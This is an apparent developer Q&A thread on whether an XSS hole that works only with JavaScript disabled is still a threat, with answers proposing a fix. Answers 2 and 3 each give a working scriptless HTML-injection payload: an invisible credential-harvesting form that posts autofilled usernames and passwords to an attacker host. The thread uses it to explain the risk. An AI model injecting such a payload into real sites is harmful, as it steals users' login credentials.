XSS exploit when JavaScript is disabled

Question

I'm getting pretty frustrated trying to make McAffee whitelist a supposed exploit on a site i work on. The issue is that their automated system has detected a supposed XSS exploit but the exploit only exists when JavaScript is disabled. Given the fact that you need JavaScript to be disabled for the exploit to exist then surely this means this is not an exploit. Can anyone think of any possible arguments to the contrary?

Update - To add more detail:

The problem comes from in one place unsanitized URL content is written to an anchor tag href.So, with JS disabled you could have something like this:

<a href="foor.php?"><script>alert('foo')</script>#someanchor" ..

When JavaScript is enabled this href is updated to be this (on dom ready):

<a href="javascript:;">link</a>

So, with JS enabled the link is no longer injected, with JS disabled the alert would no longer execute.

Answer 1

You need to change your page.

<a href="default_for_javascript_disabled" id="speciallink">link</a>

<script type="text/javascript">
    var link = document.getElementById("speciallink");
    link.href = "value_for_javascript_enabled";
</script>

Answer 2

If your site has a login form and user has password autofill enabled, I might want to inject something like the following:

<form action="http://evil.hackademix.net/log" method="POST">
<div style="position: absolute; top: -5000px">
<input type="text" name="username">
<input type="password" name="password">
</div>
<input type="submit" value="pwn me" 
style="opacity: 0; position: absolute; left: 0; top: 0; width: 100%; height: 100%;"
>
</form>

As soon as user clicks anywhere on the page, his credentials get logged on my site :) It's not XSS in strict sense (unless you consider HTML+CSS "scripting" lato sensu), but is almost equally nefarious.

Answer 3

Ooops, my HTML got lost in my previous answer. However, a malicious scriptless HTML injection may look like this:

<form action="http://evil.hackademix.net/log" method="POST">
    <div style="position: absolute; top: -5000px">
    <input type="text" name="username">
    <input type="password" name="password">
    </div>
    <input type="submit" value="pwn me" 
    style="opacity: 0; position: absolute; left: 0; top: 0; width: 100%; height: 100%;"
    >
</form>

Not to mention nice things you could do using or elements...

Answer 4

The only example I can think of that would exploit your page when JavaScriptis disabled is when you rely too much on the JavaScript.

Imagine the situation when you have some sort of clickable button, and you want to hide it from the user on page load / on tab change etc using CSS changed by JavaScript.

In the normal situation you know normal user won't be able to see this button because it's hidden, but if JavaScript is disabled all the content of the page will render straight away displaying some 'hidden' features. (I'm writing word hidden in apostrophes, because hiding stuff using CSS is a bad idea to start with, but again it all depends what sort of functionality our button has).

Other example:

<a href="/nice/clean/url/" onclick="Update.Panel.Using(Ajax); return false;">Next Page</a>

As you can see this time when JavaScript is disabled user will be redirected to the url of the link and update panel action won't be executed. Mostly you use this trick to redirect website crawlers to the correct page from href tag and treat a users differently because on their browsers JavaScript is on, so you can do some 'cool stuff'.

I'm not sure if this correctly answers your question but in general - just make sure the functionality is replicated / is working the same way as it does when JavaScript is on.